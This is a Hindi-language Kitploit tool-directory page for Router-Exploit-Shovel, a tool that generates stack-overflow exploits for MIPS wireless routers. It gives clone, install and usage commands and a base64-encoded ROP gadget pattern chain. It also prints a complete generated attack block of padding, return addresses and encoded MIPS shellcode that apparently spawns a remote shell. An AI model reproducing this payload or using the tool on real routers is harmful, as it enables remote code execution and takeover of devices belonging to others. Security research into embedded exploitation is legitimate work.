Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Router-Exploit-Shovel — वायरलेस राउटर्स पर स्टैक ओवरफ्लो प्रकारों के लिए स्वचालित एप्लिकेशन जनरेशन | Kitploit
उपकरण/GitHubGitHub/arthastang/router-exploit-shovel
एम्बेडेड सिस्टम सुरक्षाशोषण फ्रेमवर्कIoT सुरक्षापेलोड जनरेशनरिवर्स इंजीनियरिंगशेलकोडफज़िंगहार्डवेयर सुरक्षाबाइनरी शोषण
GitHubarthastang/router-exploit-shovel

Router-Exploit-Shovel

वायरलेस राउटर्स पर स्टैक ओवरफ्लो प्रकारों के लिए स्वचालित एप्लिकेशन जनरेशन

54237 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

py3.5

राउटर एक्सप्लॉइट शॉवेल

वायरलेस राउटर पर स्टैक ओवरफ्लो प्रकारों के लिए स्वचालित एप्लिकेशन जनरेशन

Router exploits shovel वायरलेस राउटर पर स्टैक ओवरफ्लो प्रकारों के लिए एक स्वचालित एप्लिकेशन जनरेशन उपकरण है। यह उपकरण एक्सप्लॉइट के प्रमुख कार्यों को लागू करता है, यह स्टैक पर डेटा पैडिंग की लंबाई के अनुकूल हो सकता है, ROP श्रृंखला उत्पन्न कर सकता है, एन्कोडेड शेलकोड उत्पन्न कर सकता है, और अंततः उन्हें एक पूर्ण आक्रमण कोड में जोड़ सकता है। उपयोगकर्ता को केवल POC के ओवरफ्लो स्थान पर आक्रमण कोड संलग्न करने की आवश्यकता है ताकि रिमोट कोड निष्पादन का एक्सप्लॉइट पूरा हो सके।

यह उपकरण MIPSel और MIPSeb का समर्थन करता है। Ubuntu 16.04 64bit पर चलता है।

स्थापना

सुनिश्चित करें कि आपके पास git, python3 और setuptools स्थापित हैं। हमारे Github से स्रोत कोड डाउनलोड करें:

root@kitploit:~
$ git clone https://github.com/arthastang/Router-Exploit-Shovel.git

वातावरण सेट करें और निर्भरताएँ स्थापित करें:

root@kitploit:~
$ cd Router-Exploit-Shovel/
$ python3 setup.py install

उपयोग

root@kitploit:~
$ python3 Router_Exploit_Shovel.py -h
Usage: Router_Exploit_Shovel.py [options]

Options:
  -h, --help            this help message show and exit
  -b BINARYFILEPATH, --binaryFile=BINARYFILEPATH
                        input binary file path
  --ba=BINARYBASEADDR, --binaryBaseAddr=BINARYBASEADDR
                        input binary base address,default=0x00400000
  -l LIBRARYFILEPATH, --libraryFile=LIBRARYFILEPATH
                        input libc file path
  --la=LIBRARYBASEADDR, --libraryBaseAddr=LIBRARYBASEADDR
                        input library base address,default=0x2aae2000
  -o OVERFLOWFUNCTIONPOINTOFFSET, --overflowPoint=OVERFLOWFUNCTIONPOINTOFFSET
                        input overflow function point offset
  --arch=ARCH           input architecture of elf files,[little] or
                        [big],default=big

उदाहरण के लिए:

root@kitploit:~
$ python3 Router_Exploit_Shovel.py -b test_binaries/mipseb-httpd -l test_binaries/libuClibc-0.9.30.so -o 0x00478584

स्क्रीनशॉट

screenshot.jpg

कोड संरचना

root@kitploit:~
--Router_Exploit_Shovel.py       #स्टार्टअप स्क्रिप्ट
--databases/                     
  |---ROP_patterns/              #ROP पैटर्न की YAML फ़ाइल        
  |---shellcodes/                #शेलकोड की YAML फ़ाइल
--example/                       #Nday कमजोरियाँ, पूर्ण रिपोर्ट और एक्सप्लॉइट कोड
--results/                       
  |---ROP_gadgets/               #ROP गैजेट उत्पन्न करने के परिणाम       
  |---attackBlock.txt            #आक्रमण ब्लॉक उत्पन्न करने के परिणाम
--ropper/                        #सभी गैजेट प्राप्त करने के लिए संशोधित ropper मॉड्यूल
--filebytes/                     #ELFs लोड करने के लिए Filebytes मॉड्यूल
--router_exp_shovel/             #मुख्य मॉड्यूल         
  |---offset_calculator/         #पैडिंग आकार की गणना करें
  |---ROP_maker/                 #ROP श्रृंखलाएँ बनाएँ
  |---shellcode_maker/           #शेलकोड बनाएँ
--qemuTestEnvironment/           #राउटर शोषण के लिए MIPS रन-एनवायरनमेंट

ROP श्रृंखला निर्माण

यह उपकरण ROP श्रृंखला उत्पन्न करने के लिए पैटर्न का उपयोग करता है। सामान्य ROP शोषण प्रक्रिया से पैटर्न निकालें। श्रृंखला स्ट्रिंग्स भरने के लिए उपलब्ध गैजेट खोजने के लिए regex मिलान का उपयोग करें। Base64 एन्कोडिंग डुप्लिकेट वर्ण एस्केप से बचने के लिए है। उदाहरण के लिए:

root@kitploit:~
chainString: (gadget2)(gadget1)BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB(sleep)CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC(call_code)DDDD(stack_gadget)\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44
gadget1: KC4qKW1vdmUgXCR0OVwsIFwkczE7IGx3IFwkcmFcLCAweDI0XChcJHNwXCk7IGx3IFwkczFcLCAweDIwXChcJHNwXCk7IGx3IFwkczBcLCAweDFjXChcJHNwXCk7KC4qKTsganIgXCR0OTsgYWRkaXUgXCRzcFwsIFwkc3BcLCAweDI4Ow==
#gadget1: (.*)move \\$t9\\, \\$s1; lw \\$ra\\, 0x24\\(\\$sp\\); lw \\$s1\\, 0x20\\(\\$sp\\); lw \\$s0\\, 0x1c\\(\\$sp\\);(.*); jr \\$t9; addiu \\$sp\\, \\$sp\\, 0x28; 
gadget2: KC4qKWFkZGl1IFwkYTBcLCBcJHplcm9cLCAxOyBtb3ZlIFwkdDlcLCBcJHMxOyBqYWxyIFwkdDk7
#gadget2: (.*)addiu \\$a0\\, \\$zero\\, 1; move \\$t9\\, \\$s1; jalr \\$t9;
call_code: KC4qKW1vdmUgXCR0OVwsIFwkczI7IGphbHIgXCR0OTs=
#call_code: (.*)move \\$t9\\, \\$s2; jalr \\$t9;
stack_gadget: KC4qKWFkZGl1IFwkczJcLCBcJHNwXCwgMHgxODsoLiopbW92ZSBcJHQ5XCwgXCRzMDsgamFsciBcJHQ5Ow==
#stack_gadget: (.*)addiu \\$s2\\, \\$sp\\, 0x18;(.*)move \\$t9\\, \\$s0; jalr \\$t9;

आक्रमण ब्लॉक

आप results/attackBlocks.txt में उत्पन्न आक्रमण ब्लॉक प्राप्त कर सकते हैं। जैसे:

root@kitploit:~
attackBlock = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x2a\xb3\x7c\x60\x2a\xb2\xbd\xfcBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\x2a\xb3\x5c\xa0CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\x2a\xb0\x09\x38DDDD\x2a\xaf\x76\x68\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99\x27\xb2\x05\x4b\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x41\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1\x02\x2a\x18\x26\xae\x43\xff\xc1\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d\x7a\x69\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c"

निर्भरताएँ

  • Ropper:बाइनरी जानकारी डंप करने और ROP श्रृंखला उत्पन्न करने के लिए एक शानदार उपकरण।https://github.com/sashs/Ropper
  • filebytes:ELF, PE, MachO और OAT फ़ाइलों को पढ़ने और संपादित करने के लिए लाइब्रेरी।https://scoding.de/filebytes-introduction
  • yaml:YAML Ain't Markup Language.https://yaml.org/
  • optparse:कमांड लाइन विकल्पों के लिए पार्सर।https://docs.python.org/3/library/optparse.html
  • Capstone:डिससेम्बली फ्रेमवर्क।http://www.capstone-engine.org/
  • re:regex मॉड्यूल।
टूल डाउनलोड करें